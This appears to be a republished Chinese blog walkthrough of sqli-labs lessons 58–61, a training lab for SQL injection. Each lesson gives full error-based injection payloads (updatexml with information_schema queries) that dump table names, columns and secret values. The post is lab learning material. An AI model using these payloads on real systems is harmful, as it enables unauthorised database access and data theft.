sqli-labs Less58-less61 challenges部分

Posted zhaihuijie

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs Less58-less61 challenges部分相关的知识,希望对你有一定的参考价值。

 

Lesson 58 GET - challenge - Double Query - 5 queries allowed - Variation 1

 

 

   由此看到,我们只有5次尝试机会,我们要尽量节省次数,order by在之前已知3列,就不再进行测试。

 

(1)第一次

  ?id=1

 

   显示正常,由此看出id值被单引号包裹

 

(2)第二次(直接使用union select语句测试)

  ?id=1\' union select 1,2,3 --+

 

   并没有回显位置,说明使用union select语句并不成功,我们要换一种方法

 

(3)第三次(使用报错注入,已知数据库为CHALLENGES,直接查表)

  ?id=1\' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'CHALLENGES\')),1)--+

 

   拿到表名:dk1yrxgzsx

 

(4)第四次(查字段)

  ?id=1\' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'dk1yrxgzsx\')),1)--+

 

   拿到字段:id,sessid,secret_XM6V,tryy

 

(5)第五次(查字段secret_XM6V的值)

  ?id=1\' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,secret_XM6V)) from CHALLENGES.dk1yrxgzsx )),1)--+

 

   拿到字段值:nr2VITJOlT5HAS6VxVYu8DBp

 

(6)提交

 

 

 

   成功

 

 

  Lesson 58结束

 

 

 

Lesson 59 GET - challenge - Double Query - 5 queries allowed - Variation 2

 

(1)第一次

  ?id=1

 

   显示正常,这次id值没有被包裹,直接注入即可.这也是与58关唯一不同的地方。

 

(2)第二次(直接进行报错注入,已知数据库为CHALLENGES,查表)

  ?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'CHALLENGES\')),1) --+

 

   拿到表名:5uqswi1l2n

 

(3)第三次(查字段)

  ?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'5uqswi1l2n\')),1) --+

   拿到字段:id,sessid,secret_375C,tryy

 

(4)第四次(查字段secret_375C的值)

  ?id=1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,secret_375C)) from CHALLENGES.5uqswi1l2n)),1) --+

 

   拿到字段值:yO06diIDBuuCLJI6KlRYrcmd

 

(5)提交

 

 

 

   成功

 

 

  Lesson 59结束

 

 

Lesson 60 GET - challenge - Double Query - 5 queries allowed - Variation 3

 

(1)第一次

  ?id=1

 

   显示正常,id值被双引号和括号包裹,这也是与58关唯一不同的地方。

 

(2)第二次(直接进行报错注入,已知数据库为CHALLENGES,查表)

  ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'CHALLENGES\')),1) --+

 

   拿到表名:k5lby23pio

 

(3)第三次(查字段)

  ?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'k5lby23pio\')),1) --+

 

   拿到字段:id,sessid,secret_LGB6,tryy

 

(4)第四次(查字段secret_LGB6的值)

  ?id=1") and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,secret_LGB6)) from CHALLENGES.k5lby23pio)),1) --+

 

   拿到字段的值:rNr9RCS45mbX7ZNlPXMUGAgt

 

 

  

(5)提交

 

 

 

   成功

 

 

  Lesson 60结束

 

 

Lesson 61 GET - challenge - Double Query - 5 queries allowed - Variation 4

 

(1)第一次

  ?id=1

 

   显示正常,这里id值被单引号和两个括号包裹,更复杂一些,这也是与58关唯一不同的地方。

 

(2)第二次(直接进行报错注入,已知数据库为CHALLENGES,查表)

  ?id=1\')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'CHALLENGES\')),1) --+

 

   拿到表名:m3ipwo4ljd

 

(3)第三次(查字段)

  ?id=1\')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'m3ipwo4ljd\')),1) --+

 

   拿到字段:id,sessid,secret_FRMD,tryy

 

(4)第四次(查字段secret_FRMD的值)

  ?id=1\')) and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,secret_FRMD)) from CHALLENGES.m3ipwo4ljd)),1) --+

 

   拿到字段的值:A4bKvDqeP2nxz0aTV6mtHnTS

 

(5)提交

 

 

 

   成功

 

 

  Lesson 61结束

 

以上是关于sqli-labs Less58-less61 challenges部分的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQL注入:sqli-labs 1~4

sqli-labs less61 GET -Challenge -Double Query -5 queries allowed -Variation4 (GET型 挑战 双查询 只允许5次查询 (代

实训第三天记录-sqli-lab7-11+upload-lab1-3